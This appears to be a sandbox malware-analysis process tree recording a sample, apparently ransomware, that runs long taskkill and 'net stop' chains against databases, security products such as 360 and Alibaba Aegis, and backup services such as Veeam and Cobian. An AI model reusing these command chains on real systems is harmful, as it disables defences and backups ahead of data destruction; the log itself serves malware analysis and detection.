C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NFOTPService6⤵PID:2604
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SupportAssistAgent.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SunloginClient.exe /F5⤵PID:2428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SOUNDMAN.exe /F5⤵PID:2388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM WeChat.exe /F5⤵PID:1872
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TXPlatform.exe /F5⤵PID:2180
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Tencentdll.exe /F5⤵PID:2196
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM httpd.exe /F5⤵PID:2252
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM jenkins.exe /F5⤵PID:2348
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM QQ.exe /F5⤵PID:2968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM HaoZip.exe /F5⤵PID:3012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM HaoZipScan.exe /F5⤵PID:2204
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM navicat.exe /F5⤵PID:3056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TSVNCache.exe /F5⤵PID:2256
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RAVCpl64.exe /F5⤵PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"4⤵PID:1320
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlservr.exe /F5⤵PID:1264
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM httpd.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM java.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdhost.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdlauncher.exe /F5⤵PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM reportingservicesservice.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM softmgrlite.exe /F5⤵PID:2780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlbrowser.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssms.exe /F5⤵PID:2804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vmtoolsd.exe /F5⤵PID:2588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM baidunetdisk.exe /F5⤵PID:2556
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM yundetectservice.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssclient.exe /F5⤵PID:1488
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNAupdaemon.exe /F5⤵PID:2652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RAVCp164.exe /F5⤵PID:3060
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxEM.exe /F5⤵PID:2992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxHK.exe /F5⤵PID:2148
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxTray.exe /F5⤵PID:1488
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM 360bdoctor.exe /F5⤵PID:2876
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNCEFExternal.exe /F5⤵
- Kills process with taskkill
PID:1328
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM PrivacyIconClient.exe /F5⤵PID:3068
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UIODetect.exe /F5⤵PID:3004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoDealService.exe /F5⤵PID:2436
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IDDAService.exe /F5⤵PID:2384
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM EnergyDataService.exe /F5⤵PID:3000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MPService.exe /F5⤵PID:2144
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TransMain.exe /F5⤵PID:2176
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DAService.exe /F5⤵PID:3024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""4⤵
- Suspicious use of AdjustPrivilegeToken
PID:560 -
C:\Windows\SysWOW64\net.exenet stop UIODetect5⤵PID:1004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UIODetect6⤵PID:1872
-
-
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer85⤵
- Discovers systems in the same network
PID:228 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer86⤵PID:216
-
-
-
C:\Windows\SysWOW64\net.exenet stop VMwareHostd5⤵PID:1688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ImtsEventSvr6⤵PID:2596
-
-
-
C:\Windows\SysWOW64\net.exenet stop VMUSBArbService5⤵PID:1052
-
-
C:\Windows\SysWOW64\net.exenet stop VMAuthdService5⤵PID:2060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMAuthdService6⤵PID:2136
-
-
-
C:\Windows\SysWOW64\net.exenet stop WebAttendServer5⤵PID:2216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WebAttendServer6⤵PID:2260
-
-
-
C:\Windows\SysWOW64\net.exenet stop mysqltransport5⤵PID:2320
-
-
C:\Windows\SysWOW64\net.exenet stop wanxiao-monitor5⤵PID:2156
-
-
C:\Windows\SysWOW64\net.exenet stop VMnetDHCP5⤵PID:2392
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMnetDHCP6⤵PID:2424
-
-
-
C:\Windows\SysWOW64\net.exenet stop "VMware NAT Service"5⤵PID:2444
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"6⤵PID:2488
-
-
-
C:\Windows\SysWOW64\net.exenet stop Tomcat85⤵PID:2572
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Tomcat86⤵PID:2796
-
-
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer5⤵
- Discovers systems in the same network
PID:3016 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer6⤵PID:2096
-
-
-
C:\Windows\SysWOW64\net.exenet stop QPCore5⤵PID:2596
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QPCore6⤵PID:2688
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASLicenceServer5⤵PID:2840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASLicenceServer6⤵PID:3068
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASWebServer5⤵PID:2068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASWebServer6⤵PID:2216
-
-
-
C:\Windows\SysWOW64\net.exenet stop AutoUpdateService5⤵PID:2340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AutoUpdateService6⤵PID:2384
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Detect Service"5⤵PID:2416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"6⤵PID:2372
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Update Service"5⤵PID:1824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"6⤵PID:2380
-
-
-
C:\Windows\SysWOW64\net.exenet stop "AliyunService"5⤵PID:292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "AliyunService"6⤵PID:1872
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASXMLService5⤵PID:3008
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASXMLService6⤵PID:2836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetVault Process Manager"7⤵PID:1324
-
-
-
-
C:\Windows\SysWOW64\net.exenet stop AGSService5⤵PID:2448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AGSService6⤵PID:2408
-
-
-
C:\Windows\SysWOW64\net.exenet stop RapService5⤵PID:2736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapService6⤵PID:2500
-
-
-
C:\Windows\SysWOW64\net.exenet stop DDNSService5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2940 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DDNSService6⤵PID:2840
-
-
-
C:\Windows\SysWOW64\net.exenet stop iNethinkSQLBackupSvc5⤵PID:3032
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop iNethinkSQLBackupSvc6⤵PID:2232
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASVirtualDiskService5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2072 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASVirtualDiskService6⤵PID:2296
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASMsgSrv5⤵PID:2200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASMsgSrv6⤵PID:2432
-
-
-
C:\Windows\SysWOW64\net.exenet stop "OracleOraDb10g_homeliSQL*Plus"5⤵PID:3048
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "OracleOraDb10g_homeliSQL*Plus"6⤵PID:2832
-
-
-
C:\Windows\SysWOW64\net.exenet stop OracleDBConsoleilas5⤵PID:2960
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleDBConsoleilas6⤵PID:2336
-
-
-
C:\Windows\SysWOW64\net.exenet stop MySQL5⤵PID:1272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL6⤵PID:2544
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdAppService12205⤵PID:544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdAppService12206⤵PID:2408
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OMAILREPORT7⤵PID:2548
-
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdTaskService12205⤵PID:2852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdTaskService12206⤵PID:228
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdUpgradeService12205⤵PID:2136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdUpgradeService12206⤵PID:2184
-
-
-
C:\Windows\SysWOW64\net.exenet stop K3MobileServiceManage5⤵PID:2424
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop K3MobileServiceManage6⤵PID:2224
-
-
-
C:\Windows\SysWOW64\net.exenet stop "FileZilla Server"5⤵PID:2684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "FileZilla Server"6⤵PID:2536
-
-
-
C:\Windows\SysWOW64\net.exenet stop DDVRulesProcessor5⤵PID:2784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DDVRulesProcessor6⤵PID:2544
-
-
-
C:\Windows\SysWOW64\net.exenet stop AutoUpdatePatchService5⤵PID:2444
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AutoUpdatePatchService6⤵PID:2736
-
-
-
C:\Windows\SysWOW64\net.exenet stop ImtsEventSvr5⤵PID:1688
-
-
C:\Windows\SysWOW64\net.exenet stop "Dell Hardware Support"5⤵PID:1632
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Dell Hardware Support"6⤵PID:2396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KugouService7⤵PID:572
-
-
-
-
C:\Windows\SysWOW64\net.exenet stop OMAILREPORT5⤵PID:2408
-
-
C:\Windows\SysWOW64\net.exenet stop SupportAssistAgent5⤵PID:2832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SupportAssistAgent6⤵PID:216
-
-
-
C:\Windows\SysWOW64\net.exenet stop K3MMainSuspendService5⤵PID:2076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop K3MMainSuspendService6⤵PID:2972
-
-
-
C:\Windows\SysWOW64\net.exenet stop KpService5⤵PID:2208
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KpService6⤵PID:2580
-
-
-
C:\Windows\SysWOW64\net.exenet stop ceng_web_svc_d5⤵PID:3016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ceng_web_svc_d6⤵PID:2408
-
-
-
C:\Windows\SysWOW64\net.exenet stop KugouService5⤵PID:2396
-
-
C:\Windows\SysWOW64\net.exenet stop pcas5⤵PID:1324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop pcas6⤵PID:2468
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8SendMailAdmin5⤵PID:1532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8SendMailAdmin6⤵PID:1936
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Apple Mobile Device Service"5⤵PID:2876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Apple Mobile Device Service"6⤵PID:2092
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Bonjour Service"5⤵PID:2168
-
-
C:\Windows\SysWOW64\net.exenet stop "ABBYY.Licensing.FineReader.Professional.12.0"5⤵PID:2432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "ABBYY.Licensing.FineReader.Professional.12.0"6⤵PID:2392
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"4⤵PID:1620
-
C:\Windows\SysWOW64\net.exenet stop HaoZipSvc5⤵PID:292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop HaoZipSvc6⤵PID:228
-
-
-
C:\Windows\SysWOW64\net.exenet stop Realtek11nSU5⤵PID:1168
-
-
C:\Windows\SysWOW64\net.exenet stop "igfxCUIService2.0.0.0"5⤵PID:556
-
-
C:\Windows\SysWOW64\net.exenet stop xenlite5⤵PID:968
-
-
C:\Windows\SysWOW64\net.exenet stop Apache2.25⤵PID:2244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.26⤵PID:2284
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Synology Drive VSS Service x64"5⤵PID:2328
-
-
C:\Windows\SysWOW64\net.exenet stop XenSvc5⤵PID:2116
-
-
C:\Windows\SysWOW64\net.exenet stop DellDRLogSvc5⤵PID:2408
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DellDRLogSvc6⤵PID:2432
-
-
-
C:\Windows\SysWOW64\net.exenet stop FirebirdGuardianDeafaultInstance5⤵PID:2460
-
-
C:\Windows\SysWOW64\net.exenet stop JWEM3DBAUTORun5⤵PID:2496
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWEM3DBAUTORun6⤵PID:2544
-
-
-
C:\Windows\SysWOW64\net.exenet stop JWRinfoClientService5⤵PID:2856
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWRinfoClientService6⤵PID:2960
-
-
-
C:\Windows\SysWOW64\net.exenet stop JWService5⤵PID:2184
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWService6⤵PID:2220
-
-
-
C:\Windows\SysWOW64\net.exenet stop Service25⤵PID:2432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Service26⤵PID:212
-
-
-
C:\Windows\SysWOW64\net.exenet stop RapidRecoveryAgent5⤵PID:2836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapidRecoveryAgent6⤵PID:2952
-
-
-
C:\Windows\SysWOW64\net.exenet stop FirebirdServerDefaultInstance5⤵PID:2864
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance6⤵PID:2168
-
-
-
C:\Windows\SysWOW64\net.exenet stop AdobeARMservice5⤵PID:2488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AdobeARMservice6⤵PID:2400
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamCatalogSvc5⤵PID:2912
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc6⤵PID:2664
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeanBackupSvc5⤵PID:968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeanBackupSvc6⤵PID:216
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamTransportSvc5⤵PID:1636
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc6⤵PID:2264
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdAppService13005⤵PID:2272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdAppService13006⤵PID:3028
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdTaskService13005⤵PID:2416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdTaskService13006⤵PID:2096
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdUpgradeService13005⤵PID:2660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdUpgradeService13006⤵PID:3064
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdWebService13005⤵PID:2956
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdWebService13006⤵PID:2348
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamNFSSvc5⤵PID:720
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc6⤵PID:3044
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeThrottling6⤵PID:2188
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamDeploySvc5⤵PID:3000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc6⤵PID:968
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamCloudSvc5⤵PID:3068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc6⤵PID:2952
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamMountSvc5⤵PID:2240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc6⤵PID:2784
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamBrokerSvc5⤵PID:2248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc6⤵PID:3040
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamDistributionSvc5⤵PID:2996
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDistributionSvc6⤵PID:2592
-
-
-
C:\Windows\SysWOW64\net.exenet stop tmlisten5⤵PID:2220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten6⤵PID:2120
-
-
-
C:\Windows\SysWOW64\net.exenet stop ServiceMid5⤵PID:2076
-
-
C:\Windows\SysWOW64\net.exenet stop 360EntPGSvc5⤵PID:2132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop 360EntPGSvc6⤵PID:1948
-
-
-
C:\Windows\SysWOW64\net.exenet stop ClickToRunSvc5⤵PID:2052
-
-
C:\Windows\SysWOW64\net.exenet stop RavTask5⤵PID:2904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RavTask6⤵PID:1272
-
-
-
C:\Windows\SysWOW64\net.exenet stop AngelOfDeath5⤵PID:2860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AngelOfDeath6⤵PID:2588
-
-
-
C:\Windows\SysWOW64\net.exenet stop d_safe5⤵PID:3016
-
-
C:\Windows\SysWOW64\net.exenet stop NFLicenceServer5⤵PID:3056
-
-
C:\Windows\SysWOW64\net.exenet stop "NetVault Process Manager"5⤵PID:2836
-
-
C:\Windows\SysWOW64\net.exenet stop RavService5⤵PID:2056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RavService6⤵PID:2572
-
-
-
C:\Windows\SysWOW64\net.exenet stop DFServ5⤵PID:1884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DFServ6⤵PID:1948
-
-
-
C:\Windows\SysWOW64\net.exenet stop IngressMgr5⤵PID:836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IngressMgr6⤵PID:2880
-
-
-
C:\Windows\SysWOW64\net.exenet stop EvtSys5⤵PID:1056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EvtSys6⤵PID:1388
-
-
-
C:\Windows\SysWOW64\net.exenet stop K3ClouManager5⤵PID:2128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop K3ClouManager6⤵PID:1476
-
-
-
C:\Windows\SysWOW64\net.exenet stop NFVPrintServer5⤵PID:2056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NFVPrintServer6⤵PID:2924
-
-
-
C:\Windows\SysWOW64\net.exenet stop RTCAVMCU5⤵PID:228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTCAVMCU6⤵PID:2332
-
-
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup105⤵PID:1120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup106⤵PID:2564
-
-
-
C:\Windows\SysWOW64\net.exenet stop GNWebService5⤵PID:2928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop GNWebService6⤵PID:1052
-
-
-
